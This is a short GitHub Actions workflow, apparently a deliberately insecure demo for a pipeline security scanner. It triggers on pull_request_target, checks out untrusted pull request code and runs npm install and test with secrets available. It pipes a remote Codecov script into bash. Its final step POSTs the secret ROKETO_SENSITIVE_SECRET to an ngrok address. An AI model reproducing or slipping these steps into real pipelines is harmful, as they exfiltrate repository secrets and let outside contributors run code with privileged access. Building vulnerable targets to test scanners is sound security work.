name: PR_TARGET_EVENT
on: pull_request_target
jobs:
  Build:
    name: Build and test
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository code
        uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      
      - uses: actions/setup-node@v1
      - run: |
          npm install
          npm test
          
      - name: use argon pipeline scanner
        uses: argon/pipesec@fadd427d6cbbf934b08745a378932722df287a53
        env:
          ARGON_AUTH_TOKEN: ${{ secrets.ARGON_AUTH_TOKEN }}

      - name: Codecov  
        run: |
          bash <(curl -s https://codecov.io/bash) | pipesec --verify
      
      - uses: fjogeleit/http-request-action@master
        with:
          url: 'https://934e-77-137-8-226.ngrok.io'
          method: 'POST'
          data: '{"secret": "${{ secrets.ROKETO_SENSITIVE_SECRET }}"}'
